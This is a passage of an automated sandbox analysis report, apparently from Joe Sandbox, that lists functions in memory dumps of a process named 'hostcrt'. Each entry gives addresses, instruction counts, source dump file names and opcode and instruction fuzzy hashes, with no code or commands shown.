                                                            • Instruction ID: 6d6bfc847da52b1912519fc5bd475e8b7280a4d77ed3d4fe3fb094c060b16eb1
                                                            • Opcode Fuzzy Hash: d286108d810e56ce988f9481b50afcee7a485f031339c782e8a4a1093fe0139b
                                                            • Instruction Fuzzy Hash: 5461E731E5C64B8FEB69EBA484606BD7BB0EF45340F5005B9E00EE71A2DE286842C745
                                                            Function 00007FFD9C1CEEF0 Relevance: .2, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fc1f49758d81e18f38e514b9b763704f5209f82227f87cc847042482b2c946c
                                                            • Instruction ID: 87038cd3aa27df23fc072c5ee701723cfec1b673fc37cae0bcdcf1081f0f5ba9
                                                            • Opcode Fuzzy Hash: 3fc1f49758d81e18f38e514b9b763704f5209f82227f87cc847042482b2c946c
                                                            • Instruction Fuzzy Hash: A9510531A1C56B4EEBB8EA5888717B877B1FF94340F1041F9E04DD7186CE38A9858741
                                                            Function 00007FFD9BAC08E8 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d64448fd534a675f10566ceabddabbfad0eaf675f55e76b813af0b8df6cdc5b2
                                                            • Instruction ID: a31f84a881859e881699695433d644e0eceb24dc9a7d48ba0a4c7fdec8f50dd6
                                                            • Opcode Fuzzy Hash: d64448fd534a675f10566ceabddabbfad0eaf675f55e76b813af0b8df6cdc5b2
                                                            • Instruction Fuzzy Hash: 4151B331A0850D9FCF54EF58D894EED7BF1FF58325B054266E409E72A1CA74E980CB80
                                                            Function 00007FFD9C1C15FF Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7ff60f436b44f46a3c7543f0bf4823c28d4ab08b2d984565ed782cb54a790fd
                                                            • Instruction ID: a6e01d340e2c3360608dc88a53a7a8d90fc8ca4095ed53a17126e76283bb6731
                                                            • Opcode Fuzzy Hash: c7ff60f436b44f46a3c7543f0bf4823c28d4ab08b2d984565ed782cb54a790fd
                                                            • Instruction Fuzzy Hash: 9D41F862A8E7D74FE76B56B458340A47FB0DF432A0F1D01FBE089CA093D9885847C356
                                                            Function 00007FFD9BAC090D Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf4aa309abe7dd681cdd1f0bb1b62e1dc5bc70c14ed083ee123deddceb8bf943
                                                            • Instruction ID: 1c7c4a3dbfd90120fe95a834a78c413356e93720465ba1ba31ae24ff9452d8a3
                                                            • Opcode Fuzzy Hash: cf4aa309abe7dd681cdd1f0bb1b62e1dc5bc70c14ed083ee123deddceb8bf943
                                                            • Instruction Fuzzy Hash: 8141C731E0855D4EDB64FBA8D8A5AFC77A0EF58329F14067BE40DD61D7CE286481C784
                                                            Function 00007FFD9C1CB4FC Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83f8a4be9ffc0b27fbf3644ad46d75637692f5c3f9bd0de7b62f882633a90aa1
                                                            • Instruction ID: dd6bbefe40db52129e87bededa1fca0a4af364e771cb4f2640793a97a6081886
                                                            • Opcode Fuzzy Hash: 83f8a4be9ffc0b27fbf3644ad46d75637692f5c3f9bd0de7b62f882633a90aa1
                                                            • Instruction Fuzzy Hash: D241143198E3CA8FE713A764D8255E93FA0EF83364F0841EAE089CA0A3D6595456C746
                                                            Function 00007FFD9C1C41C7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 661e14f8f463d9254073cf1a2f352c9983ce4603bdbc085a13886e89734329d0
                                                            • Instruction ID: 06aab68b0caf71cff791649f127a1fccf06385dd602deee13b5409b25aac5c15
                                                            • Opcode Fuzzy Hash: 661e14f8f463d9254073cf1a2f352c9983ce4603bdbc085a13886e89734329d0
                                                            • Instruction Fuzzy Hash: 1641613260C9498FEBA8FF18D4659A477E1FFA8324B04016AE04ED7692DE35F845CB85
                                                            Function 00007FFD9C1C4271 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c90952fb7a9f7bab84360209501d28435061a0560924627d3635d9811cb1483
                                                            • Instruction ID: 2ecf99dd51e7f101759cb5a62e223d50f6df0432f5d53653fe513001ee692c3c
                                                            • Opcode Fuzzy Hash: 0c90952fb7a9f7bab84360209501d28435061a0560924627d3635d9811cb1483
                                                            • Instruction Fuzzy Hash: 0031603260C9598FEBACEF18C465E6477E1FFA8324B0402A9E05EC7592DE34F845CB85
                                                            Function 00007FFD9C1C420B Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10ee82352bd1297fce6031b7487caa62b143b99e3942c524aaf509ed989aad6c
                                                            • Instruction ID: bdf0308b7aacb1dbe9547e633c57b24649e48dbd1ee86e41af493a4abf958d2c
                                                            • Opcode Fuzzy Hash: 10ee82352bd1297fce6031b7487caa62b143b99e3942c524aaf509ed989aad6c
                                                            • Instruction Fuzzy Hash: F331303260C9598FEBACEF18C465EA477E1FFA8324B0401A9E04ED7592DE34F845CB85
                                                            Function 00007FFD9C1CC40A Relevance: .1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0daefa392e713ec4917d3080ae5cf647d1e64b3552bbf8f9f513fc33ec520252
                                                            • Instruction ID: ea253731e7036f7911a430b3587c6d46df202dab51cafef61ebdc1098f193eda
                                                            • Opcode Fuzzy Hash: 0daefa392e713ec4917d3080ae5cf647d1e64b3552bbf8f9f513fc33ec520252
                                                            • Instruction Fuzzy Hash: C531C113A4EBC70FE72767B448755B43FB19F93190B0981FAE499CA4D3D90D6C458352
                                                            Function 00007FFD9BAC0998 Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 059515cf735d2acf526f3b5c342da78355efc8fd2cf128759097115daa57d62f
                                                            • Instruction ID: 50eb35739b1096781346495fb3abceed23c0aa53114b586820c191ddf8a800f8
                                                            • Opcode Fuzzy Hash: 059515cf735d2acf526f3b5c342da78355efc8fd2cf128759097115daa57d62f
                                                            • Instruction Fuzzy Hash: AF310770A1495D8FDF94EF98C895AEDB7B1FFA8315F11016AE409E32A5CB34A9418B80
                                                            Function 00007FFD9C1CB53A Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f965780a4d25cfae8c655511d61162a2cacca2e9955b92c227ce5599f00733b5
                                                            • Instruction ID: 01d72c1029e58b544a9ccf8bd03dcab88c2cda99a21b5141fa176cbb8dfbdac5
                                                            • Opcode Fuzzy Hash: f965780a4d25cfae8c655511d61162a2cacca2e9955b92c227ce5599f00733b5
                                                            • Instruction Fuzzy Hash: FB31E721A8E3C68FE753A374E8646E93FB1AF43364F1841FAF085DA0E3C6990556C716
                                                            Function 00007FFD9C1C132D Relevance: .1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78a0ea3db627d21754be6dd077bca7494349beb5f69cd444c5b5ffa18809071f
                                                            • Instruction ID: a91840f9df7e00dceb95bcebc26f376125120f8d815f765c663e6d377dc87540
                                                            • Opcode Fuzzy Hash: 78a0ea3db627d21754be6dd077bca7494349beb5f69cd444c5b5ffa18809071f
                                                            • Instruction Fuzzy Hash: 69318372B59A1A4FDB58EAA8D4615ACB7A1FF49320B144179D05EE3682CF247812CB84
                                                            Function 00007FFD9C1CC9D5 Relevance: .1, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d2e7fadb3708ccbfbd1e73aa7e91b226fb53f8a0c557edf2ec1a1ca5cac0329
                                                            • Instruction ID: 65a11fe9b7c26501c71a327d0a4d541ac94158c0635f9890d8b378a07868c3b0
                                                            • Opcode Fuzzy Hash: 6d2e7fadb3708ccbfbd1e73aa7e91b226fb53f8a0c557edf2ec1a1ca5cac0329
                                                            • Instruction Fuzzy Hash: 6231A572E4C98E8FDB55EBA4C8745EC7BB1FF59350F14017AE00AE7292DA24AC05CB14
                                                            Function 00007FFD9C1CD415 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64562ed45345dd3da34c40ff072b2cdeb023e8958d21d392fee710a4ba7c4026
                                                            • Instruction ID: b3885e1a1d21857d8ce6ec6d8dd5b5dd6276b20e9c893ac8ea23e2ce1cc6236e
                                                            • Opcode Fuzzy Hash: 64562ed45345dd3da34c40ff072b2cdeb023e8958d21d392fee710a4ba7c4026
                                                            • Instruction Fuzzy Hash: A731E872B5CA464FF764F7A848622A8B7F1FF54350F040279E15ED35C2DE1C68028385
                                                            Function 00007FFD9BD13A2A Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826966376.00007FFD9BD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bd10000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dff37f1cfd86c528bfd1a2705caee442e29e034543c016054842e0b8fd2e16a8
                                                            • Instruction ID: 424834a028ee229cb2445c45e96c520d655272214d013e6cccd573c77daced16
                                                            • Opcode Fuzzy Hash: dff37f1cfd86c528bfd1a2705caee442e29e034543c016054842e0b8fd2e16a8
                                                            • Instruction Fuzzy Hash: AA316671F1DA5E4BEBACDB58C865964B7E2FF68314F0511FDE04DC3192DA34A9818B02
                                                            Function 00007FFD9C1C13EA Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e031cc0ed3f3dc133da2709dd3c798adc2a3306eeb6d045326fa619ffd042a5
                                                            • Instruction ID: 3d170f88af41ac6e06e4eb4b0fa682bd20457a245ef7e1dcfd9075780cc9481d
                                                            • Opcode Fuzzy Hash: 9e031cc0ed3f3dc133da2709dd3c798adc2a3306eeb6d045326fa619ffd042a5
                                                            • Instruction Fuzzy Hash: 0231FB33B9DA4A4FE76CE7A858222E877E1FF55350F6402BAE05ED31C2DF1964028785
                                                            Function 00007FFD9C1CD35B Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6cd77291fbf76f8de0c19170ebfa6b342ad0b885ac6be5c62c3ecfe871f04c7
                                                            • Instruction ID: 12bf37f953fde662f2d6f8c4b82061882e6d41a822b5fe2410c70500d836fcb2
                                                            • Opcode Fuzzy Hash: b6cd77291fbf76f8de0c19170ebfa6b342ad0b885ac6be5c62c3ecfe871f04c7
                                                            • Instruction Fuzzy Hash: DB313472B5890A9FEB54EF58C4A19A9F3B2FF54750B108139E01EE3681CF24BC12CB84
                                                            Function 00007FFD9C1C3FD5 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 602e3ba0f1fc4c0b09b4918675dbb673dc74875f3277b651386948e327463451
                                                            • Instruction ID: 25daf421b6e6a4781772e3878ec851001f943e0138921fac9f8f81c8145268ea
                                                            • Opcode Fuzzy Hash: 602e3ba0f1fc4c0b09b4918675dbb673dc74875f3277b651386948e327463451
                                                            • Instruction Fuzzy Hash: B8312832E8C54FCAEB78EB9484619FD77B1FF44380F50017AE41EE6581CA38E9609B59
                                                            Function 00007FFD9BAC1D6D Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15700550777b7500937a1b7bd772ddf112c633fe3e8f65cdfdcc0c9326e4c2c6
                                                            • Instruction ID: abfacbdfe97b4d1251c1a40d112dd7f01ad46951f25f87f4cd7596cb180fb27f
                                                            • Opcode Fuzzy Hash: 15700550777b7500937a1b7bd772ddf112c633fe3e8f65cdfdcc0c9326e4c2c6
                                                            • Instruction Fuzzy Hash: 3E3199B0A0852D8ECFA8DF14C855BAAB7B1FB68315F1041EE910EE32A5DB755A80CF45
                                                            Function 00007FFD9C1CEEC0 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f3dc9fce901f8219f2829c0536d05623a5e2dce0ae53c35bf198e20f445ddb8
                                                            • Instruction ID: 9153134f9dfa8bf451b1189f0b449de1a58f80c8282f65c310b6d92c9bd43417
                                                            • Opcode Fuzzy Hash: 0f3dc9fce901f8219f2829c0536d05623a5e2dce0ae53c35bf198e20f445ddb8
                                                            • Instruction Fuzzy Hash: 8E314712A5C5A74EF339935888715B47F71EF9239071882FAE08ADF4DBC53CB8858345
                                                            Function 00007FFD9C1C02C2 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e427542b0f9c0264a1a8eb8d8994979b3c16032e1927b10a1803fa9f34010e1
                                                            • Instruction ID: 0d8d5d10276f7cdaff5d1f55fc80d1db7ecd7156e4dc94a042ef27587dd567ab
                                                            • Opcode Fuzzy Hash: 1e427542b0f9c0264a1a8eb8d8994979b3c16032e1927b10a1803fa9f34010e1
                                                            • Instruction Fuzzy Hash: FA212B31A0891D8FDF98EB58C8A5AEDB3B1FF58310F4041AEE04EE3291CE35A940CB40
                                                            Function 00007FFD9C1CCDB2 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c027575d4c4471ac96d9ccd4660b05436297f550c7aac211652148ca6092195f
                                                            • Instruction ID: 91c664e84dbea6b181f84e425be689aa201eecf13cdd867fe93e78e5029d660e
                                                            • Opcode Fuzzy Hash: c027575d4c4471ac96d9ccd4660b05436297f550c7aac211652148ca6092195f
                                                            • Instruction Fuzzy Hash: 7B21FB71A1491D8FDFA8EB58C465AADB7B1FF68310F1041AEE00EE3291CA35A941CB44
                                                            Function 00007FFD9BAC16D3 Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1a2d83e25641d1a2bc0ea1e256bd12e4c341ca0551e5a2bd4bac84567b0a3e4
                                                            • Instruction ID: 78bdf2408ba9ef186462e94f085131825fb3709134425accca3817cdecb6a6d0
                                                            • Opcode Fuzzy Hash: c1a2d83e25641d1a2bc0ea1e256bd12e4c341ca0551e5a2bd4bac84567b0a3e4
                                                            • Instruction Fuzzy Hash: 6B31D135B0E68E8BEB21AF64CC206F9BBA0EF51351F1502BAD55C831E1DFB86644CB41
                                                            Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35dda20673d99fe45ead1b319985014a475a0f78972d8068fbc86c4a95f400ca
                                                            • Instruction ID: 5552e3d5d79fbbd94aba09b91fa4510d4242b62866e4f616faaecf8190703683
                                                            • Opcode Fuzzy Hash: 35dda20673d99fe45ead1b319985014a475a0f78972d8068fbc86c4a95f400ca
                                                            • Instruction Fuzzy Hash: 0921C336B0E68D8BE731B7A8DC112FD7760EF92321F010277C155971E2DA742209CB85
                                                            Function 00007FFD9BAC4E4A Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f4dd5e4c3caf1744188e1ccafd8db2f5a8fffc12c9ab1d4295a40f1dee1089c
                                                            • Instruction ID: 7fea7dff472d1b7896ca052639e9f296fa6d245ff0f4843479b1e5a92ad7ebe4
                                                            • Opcode Fuzzy Hash: 7f4dd5e4c3caf1744188e1ccafd8db2f5a8fffc12c9ab1d4295a40f1dee1089c
                                                            • Instruction Fuzzy Hash: 0331D470E0952D8EEBB4EB54C8656F8B2B1EF54301F1506FA900DE32A1DFB95BD08E48
                                                            Function 00007FFD9BAC1172 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ecf5d706bb48d3f1e21232fea8febfb654e4bdcf1de5aa3beda3319d82d1ec4
                                                            • Instruction ID: 1cb8a6b237c52c0fd8e5501a07af244957881942a8ad21f4bdae32456aa64e5e
                                                            • Opcode Fuzzy Hash: 1ecf5d706bb48d3f1e21232fea8febfb654e4bdcf1de5aa3beda3319d82d1ec4
                                                            • Instruction Fuzzy Hash: E321E730A1491D8FDB94FBA8C8989BDB7F1FF28304B11056AD419D72A5DF75A981CB40
                                                            Function 00007FFD9C1C2EEB Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b6cd1f4b4c9396ccbe3466754859e1005f58e54d7112cd8a64abf8958712eea
                                                            • Instruction ID: 4cf24bec1e2e6a0bda878f99124afa4856cc69ee715b62166eb0f160ec68172c
                                                            • Opcode Fuzzy Hash: 5b6cd1f4b4c9396ccbe3466754859e1005f58e54d7112cd8a64abf8958712eea
                                                            • Instruction Fuzzy Hash: 57213B11A6C46F87F738D28884715B47A61EF90740B1486FAE44B9B48BCC3CB9818344
                                                            Function 00007FFD9C1CCAB1 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3352f4ccd43179fca4b0b788b038980f45765702f5c4d07fb3a8a64a4a23a247
                                                            • Instruction ID: cb7ab85281b02c3ad4b79cc54534d15d5c081793be803a997d7057b4cab1e15d
                                                            • Opcode Fuzzy Hash: 3352f4ccd43179fca4b0b788b038980f45765702f5c4d07fb3a8a64a4a23a247
                                                            • Instruction Fuzzy Hash: 1D11DD53F8E1938BF239F6E418712BC66309F647E0F1802BAF84EE61C2DC0C2C45529A
                                                            Function 00007FFD9C1C2EF0 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7e73866ef4024b2f42af0a591ad23fe3aff6f98d922debbe46da8557994334e
                                                            • Instruction ID: 8aeaab911f3623bab50465b9c824b5821c226b89079fac868d0e2637a8caba8d
                                                            • Opcode Fuzzy Hash: c7e73866ef4024b2f42af0a591ad23fe3aff6f98d922debbe46da8557994334e
                                                            • Instruction Fuzzy Hash: 5111E411A6C42F87F738E28884715B47661EF94751B2486FAE44B9B48FCD3CB9819385
                                                            Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2141e72720c1c3c1cfa8242d57643b0fa970cbb98ef6778087df4bf3fe18061d
                                                            • Instruction ID: 3919b1c6733083ede479eef0ed360227e5f148b994f2ae445e9bfb82aaadff5e
                                                            • Opcode Fuzzy Hash: 2141e72720c1c3c1cfa8242d57643b0fa970cbb98ef6778087df4bf3fe18061d
                                                            • Instruction Fuzzy Hash: 41115931B0E64E8BE721BBA8D8212FD7760EF51310F014677D1559B2E2DE7822058B84
                                                            Function 00007FFD9C1C1F70 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
